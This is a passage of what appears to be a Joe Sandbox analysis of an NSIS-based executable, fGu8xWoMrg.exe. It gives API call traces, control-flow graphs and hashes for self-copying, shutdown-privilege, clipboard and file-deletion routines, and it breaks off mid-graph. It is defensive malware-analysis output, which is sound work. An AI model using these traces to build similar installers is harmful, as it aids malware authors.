                                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004037E4
                                                                                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004037F0
                                                                                                                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403804
                                                                                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040380C
                                                                                                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040381D
                                                                                                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403825
                                                                                                                                                                            • DeleteFileW.KERNELBASE(1033), ref: 00403839
                                                                                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\fGu8xWoMrg.exe",00000000,?), ref: 00403920
                                                                                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\fGu8xWoMrg.exe",00000000,?), ref: 0040392F
                                                                                                                                                                              • Part of subcall function 00405AB5: CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
                                                                                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\fGu8xWoMrg.exe",00000000,?), ref: 0040393A
                                                                                                                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\fGu8xWoMrg.exe",00000000,?), ref: 00403946
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403966
                                                                                                                                                                            • DeleteFileW.KERNEL32(00420EC8,00420EC8,?,0042B000,?), ref: 004039C5
                                                                                                                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\fGu8xWoMrg.exe,00420EC8,00000001), ref: 004039D8
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00420EC8,00420EC8,?,00420EC8,00000000), ref: 00403A05
                                                                                                                                                                            • OleUninitialize.OLE32(?), ref: 00403A28
                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00403A42
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A56
                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403A5D
                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A71
                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AB5
                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00403AD6
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                                                                                                            • String ID: "C:\Users\user\Desktop\fGu8xWoMrg.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner$C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner$C:\Users\user\Desktop$C:\Users\user\Desktop\fGu8xWoMrg.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                            • API String ID: 3859024572-3954714193
                                                                                                                                                                            • Opcode ID: d026ce5e89d3d63a3cb2047e2171d7ed2e8d5a22846132119ce05c7a2189c2c0
                                                                                                                                                                            • Instruction ID: 4ac2e024d61b6b1728d26ff681f76297cbcac85f62426f0f8165ebe0db49c467
                                                                                                                                                                            • Opcode Fuzzy Hash: d026ce5e89d3d63a3cb2047e2171d7ed2e8d5a22846132119ce05c7a2189c2c0
                                                                                                                                                                            • Instruction Fuzzy Hash: 79E10770A00214ABDB20AFB59D45BAF3AB8EB04709F50847FF441B62D1DB7D8A41CB6D
                                                                                                                                                                            Function 004056A8 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 143 4056a8-4056c3 144 405852-405859 143->144 145 4056c9-405790 GetDlgItem * 3 call 404498 call 404df1 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 405883-405890 144->147 148 40585b-40587d GetDlgItem CreateThread CloseHandle 144->148 167 405792-4057ac SendMessageW * 2 145->167 168 4057ae-4057b1 145->168 150 405892-405898 147->150 151 4058ae-4058b8 147->151 148->147 155 4058d3-4058dc call 4044ca 150->155 156 40589a-4058a9 ShowWindow * 2 call 404498 150->156 152 4058ba-4058c0 151->152 153 40590e-405912 151->153 157 4058c2-4058ce call 40443c 152->157 158 4058e8-4058f8 ShowWindow 152->158 153->155 161 405914-40591a 153->161 164 4058e1-4058e5 155->164 156->151 157->155 165 405908-405909 call 40443c 158->165 166 4058fa-405903 call 405569 158->166 161->155 169 40591c-40592f SendMessageW 161->169 165->153 166->165 167->168 172 4057c1-4057d8 call 404463 168->172 173 4057b3-4057bf SendMessageW 168->173 174 405a31-405a33 169->174 175 405935-405960 CreatePopupMenu call 406544 AppendMenuW 169->175 182 4057da-4057ee ShowWindow 172->182 183 40580e-40582f GetDlgItem SendMessageW 172->183 173->172 174->164 180 405962-405972 GetWindowRect 175->180 181 405975-40598a TrackPopupMenu 175->181 180->181 181->174 184 405990-4059a7 181->184 185 4057f0-4057fb ShowWindow 182->185 186 4057fd 182->186 183->174 187 405835-40584d SendMessageW * 2 183->187 188 4059ac-4059c7 SendMessageW 184->188 189 405803-405809 call 404498 185->189 186->189 187->174 188->188 190 4059c9-4059ec OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->190 189->183 192 4059ee-405a15 SendMessageW 190->192 192->192 193 405a17-405a2b GlobalUnlock SetClipboardData CloseClipboard 192->193 193->174
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 00405706
                                                                                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405715
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00405752
                                                                                                                                                                            • GetSystemMetrics.USER32(00000002), ref: 00405759
                                                                                                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040577A
                                                                                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040578B
                                                                                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040579E
                                                                                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057AC
                                                                                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057BF
                                                                                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004057E1
                                                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004057F5
                                                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405816
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405826
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040583F
                                                                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040584B
                                                                                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405724
                                                                                                                                                                              • Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
                                                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405868
                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_0000563C,00000000), ref: 00405876
                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 0040587D
                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 004058A1
                                                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004058A6
                                                                                                                                                                            • ShowWindow.USER32(00000008), ref: 004058F0
                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405924
                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 00405935
                                                                                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405949
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00405969
                                                                                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405982
                                                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059BA
                                                                                                                                                                            • OpenClipboard.USER32(00000000), ref: 004059CA
                                                                                                                                                                            • EmptyClipboard.USER32 ref: 004059D0
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004059DC
                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004059E6
                                                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059FA
                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405A1A
                                                                                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405A25
                                                                                                                                                                            • CloseClipboard.USER32 ref: 00405A2B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                            • String ID: {
                                                                                                                                                                            • API String ID: 590372296-366298937
                                                                                                                                                                            • Opcode ID: b1b6d11e03e474fe05ed43e1ab8ee8a1b6ba8e9c1710d92ba4998ff04e9fb9cd
                                                                                                                                                                            • Instruction ID: 5b575598c53da42792c2c30fd658baa27f5e0e9a45260ba980af1f6e758e053f
                                                                                                                                                                            • Opcode Fuzzy Hash: b1b6d11e03e474fe05ed43e1ab8ee8a1b6ba8e9c1710d92ba4998ff04e9fb9cd
                                                                                                                                                                            • Instruction Fuzzy Hash: 6EB16AB1900609FFEB11AF90DD89AAE7B79FB04354F10803AFA45B61A0CB754E51DF68
                                                                                                                                                                            Function 00405C13 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 500 405c13-405c39 call 405ede 503 405c52-405c59 500->503 504 405c3b-405c4d DeleteFileW 500->504 506 405c5b-405c5d 503->506 507 405c6c-405c7c call 406507 503->507 505 405dcf-405dd3 504->505 508 405c63-405c66 506->508 509 405d7d-405d82 506->509 513 405c8b-405c8c call 405e22 507->513 514 405c7e-405c89 lstrcatW 507->514 508->507 508->509 509->505 512 405d84-405d87 509->512 515 405d91-405d99 call 40683d 512->515 516 405d89-405d8f 512->516 517 405c91-405c95 513->517 514->517 515->505 524 405d9b-405daf call 405dd6 call 405bcb 515->524 516->505 520 405ca1-405ca7 lstrcatW 517->520 521 405c97-405c9f 517->521 523 405cac-405cc8 lstrlenW FindFirstFileW 520->523 521->520 521->523 525 405d72-405d76 523->525 526 405cce-405cd6 523->526 540 405db1-405db4 524->540 541 405dc7-405dca call 405569 524->541 525->509 528 405d78 525->528 529 405cf6-405d0a call 406507 526->529 530 405cd8-405ce0 526->530 528->509 542 405d21-405d2c call 405bcb 529->542 543 405d0c-405d14 529->543 533 405ce2-405cea 530->533 534 405d55-405d65 FindNextFileW 530->534 533->529 539 405cec-405cf4 533->539 534->526 538 405d6b-405d6c FindClose 534->538 538->525 539->529 539->534 540->516 544 405db6-405dc5 call 405569 call 4062c7 540->544 541->505 553 405d4d-405d50 call 405569 542->553 554 405d2e-405d31 542->554 543->534 545 405d16-405d1f call 405c13 543->545 544->505 545->534 553->534 557 405d33-405d43 call 405569 call 4062c7 554->557 558 405d45-405d4b 554->558 557->534 558->534
                                                                                                                                                                            APIs
                                                                                                                                                                            • DeleteFileW.KERNELBASE(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C3C
                                                                                                                                                                            • lstrcatW.KERNEL32(00425710,\*.*,00425710,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C84
                                                                                                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00425710,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CA7
                                                                                                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,00425710,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CAD
                                                                                                                                                                            • FindFirstFileW.KERNEL32(00425710,?,?,?,0040A014,?,00425710,?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CBD
                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D5D
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00405D6C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                            • String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                            • API String ID: 2035342205-1049245928
                                                                                                                                                                            • Opcode ID: d9acfb67b6692fe63fef00afaeab71217e0c0e788268e2aa2b253bff87fc1474
                                                                                                                                                                            • Instruction ID: 7f21bfa76759dd048c017f5e8d67b30635c21f713a141b53f9c1cb2b61cba077
                                                                                                                                                                            • Opcode Fuzzy Hash: d9acfb67b6692fe63fef00afaeab71217e0c0e788268e2aa2b253bff87fc1474
                                                                                                                                                                            • Instruction Fuzzy Hash: BD419F30400A15BADB21AB619C8DAAF7B78EF41718F14817BF801721D1D77C4A82DEAE
                                                                                                                                                                            Function 00406BFE Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 727 406bfe-406c03 728 406c74-406c92 727->728 729 406c05-406c34 727->729 732 40726a-40727f 728->732 730 406c36-406c39 729->730 731 406c3b-406c3f 729->731 733 406c4b-406c4e 730->733 734 406c41-406c45 731->734 735 406c47 731->735 736 407281-407297 732->736 737 407299-4072af 732->737 738 406c50-406c59 733->738 739 406c6c-406c6f 733->739 734->733 735->733 740 4072b2-4072b9 736->740 737->740 743 406c5b 738->743 744 406c5e-406c6a 738->744 745 406e41-406e5f 739->745 741 4072e0-4072ec 740->741 742 4072bb-4072bf 740->742 755 406a82-406a8b 741->755 746 4072c5-4072dd 742->746 747 40746e-407478 742->747 743->744 751 406cd4-406d02 744->751 749 406e61-406e75 745->749 750 406e77-406e89 745->750 746->741 752 407484-407497 747->752 756 406e8c-406e96 749->756 750->756 753 406d04-406d1c 751->753 754 406d1e-406d38 751->754 758 40749c-4074a0 752->758 757 406d3b-406d45 753->757 754->757 761 406a91 755->761 762 407499 755->762 759 406e98 756->759 760 406e39-406e3f 756->760 764 406d4b 757->764 765 406cbc-406cc2 757->765 766 406e14-406e18 759->766 767 406fa9-406fb6 759->767 760->745 763 406ddd-406de7 760->763 768 406a98-406a9c 761->768 769 406bd8-406bf9 761->769 770 406b3d-406b41 761->770 771 406bad-406bb1 761->771 762->758 772 40742c-407436 763->772 773 406ded-406e0f 763->773 789 406ca1-406cb9 764->789 790 407408-407412 764->790 774 406d75-406d7b 765->774 775 406cc8-406cce 765->775 778 407420-40742a 766->778 779 406e1e-406e36 766->779 767->755 768->752 783 406aa2-406aaf 768->783 769->732 781 406b47-406b60 770->781 782 4073ed-4073f7 770->782 776 406bb7-406bcb 771->776 777 4073fc-407406 771->777 772->752 773->767 785 406dd9 774->785 787 406d7d-406d9b 774->787 775->751 775->785 786 406bce-406bd6 776->786 777->752 778->752 779->760 788 406b63-406b67 781->788 782->752 783->762 784 406ab5-406afb 783->784 791 406b23-406b25 784->791 792 406afd-406b01 784->792 785->763 786->769 786->771 793 406db3-406dc5 787->793 794 406d9d-406db1 787->794 788->770 795 406b69-406b6f 788->795 789->765 790->752 798 406b33-406b3b 791->798 799 406b27-406b31 791->799 796 406b03-406b06 GlobalFree 792->796 797 406b0c-406b1a GlobalAlloc 792->797 800 406dc8-406dd2 793->800 794->800 801 406b71-406b78 795->801 802 406b99-406bab 795->802 796->797 797->762 803 406b20 797->803 798->788 799->798 799->799 800->774 806 406dd4 800->806 804 406b83-406b93 GlobalAlloc 801->804 805 406b7a-406b7d GlobalFree 801->805 802->786 803->791 804->762 804->802 805->804 808 407414-40741e 806->808 809 406d5a-406d72 806->809 808->752 809->774
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
                                                                                                                                                                            • Instruction ID: 53db679fe0595a89c24929100efc96b5d5a2697a31689bd0580b70dbb8294089
                                                                                                                                                                            • Opcode Fuzzy Hash: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
                                                                                                                                                                            • Instruction Fuzzy Hash: 55F17770D04269CBDF18CFA8C8946ADBBB0FF44305F25816ED856BB281D7786A86CF45
                                                                                                                                                                            Function 0040683D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindFirstFileW.KERNELBASE(75923420,00426758,00425F10,00405F27,00425F10,00425F10,00000000,00425F10,00425F10,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 00406848
                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406854
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2151955074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2151939077.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151976521.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2151999386.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2152172460.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fGu8xWoMrg.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                            • String ID: XgB
                                                                                                                                                                            • API String ID: 2295610775-796949446
                                                                                                                                                                            • Opcode ID: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                                                                                                                                                                            • Instruction ID: 6b6802a92a84c0d1895eb5c997cd82d97c30a63e480feb254935e86212d72bfe
                                                                                                                                                                            • Opcode Fuzzy Hash: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                                                                                                                                                                            • Instruction Fuzzy Hash: 4AD0C9325051205BC2402638AF0C84B6B9A9F563313228A36B5A6E11A0C6348C3286AC
                                                                                                                                                                            Function 00403F64 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 194 403f64-403f76 195 403f7c-403f82 194->195 196 4040dd-4040ec 194->196 195->196 199 403f88-403f91 195->199 197 40413b-404150 196->197 198 4040ee-404136 GetDlgItem * 2 call 404463 SetClassLongW call 40140b 196->198 201 404190-404195 call 4044af 197->201 202 404152-404155 197->202 198->197 203 403f93-403fa0 SetWindowPos 199->203 204 403fa6-403fad 199->204 218 40419a-4041b5 201->218 206 404157-404162 call 401389 202->206 207 404188-40418a 202->207 203->204 209 403ff1-403ff7 204->209 210 403faf-403fc9 ShowWindow 204->210 206->207 234 404164-404183 SendMessageW 206->234 207->201 217 404430 207->217 214 404010-404013 209->214 215 403ff9-40400b DestroyWindow 209->215 211 4040ca-4040d8 call 4044ca 210->211 212 403fcf-403fe2 GetWindowLongW 210->212 222 404432-404439 211->222 212->211 219 403fe8-403feb ShowWindow 212->219 223 404015-404021 SetWindowLongW 214->223 224 404026-40402c 214->224 221 40440d-404413 215->221 217->222 227 4041b7-4041b9 call 40140b 218->227 228 4041be-4041c4 218->228 219->209 221->217 230 404415-40441b 221->230 223->222 224->211 233 404032-404041 GetDlgItem 224->233 227->228 231 4041ca-4041d5 228->231 232 4043ee-404407 DestroyWindow EndDialog 228->232 230->217 236 40441d-404426 ShowWindow 230->236 231->232 237 4041db-404228 call 406544 call 404463 * 3 GetDlgItem 231->237 232->221 238 404060-404063 233->238 239 404043-40405a SendMessageW IsWindowEnabled 233->239 234->222 236->217 266 404232-40426e ShowWindow KiUserCallbackDispatcher call 404485 EnableWindow 237->266 267 40422a-40422f 237->267 241 404065-404066 238->241 242 404068-40406b 238->242 239->217 239->238 244 404096-40409b call 40443c 241->244 245 404079-40407e 242->245 246 40406d-404073 242->246 244->211 249 4040b4-4040c4 SendMessageW 245->249 251 404080-404086 245->251 246->249 250 404075-404077 246->250 249->211 250->244 252 404088-40408e call 40140b 251->252 253 40409d-4040a6 call 40140b 251->253 262 404094 252->262 253->211 263 4040a8-4040b2 253->263 262->244 263->262 270 404270-404271 266->270 271 404273 266->271 267->266 272 404275-4042a3 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 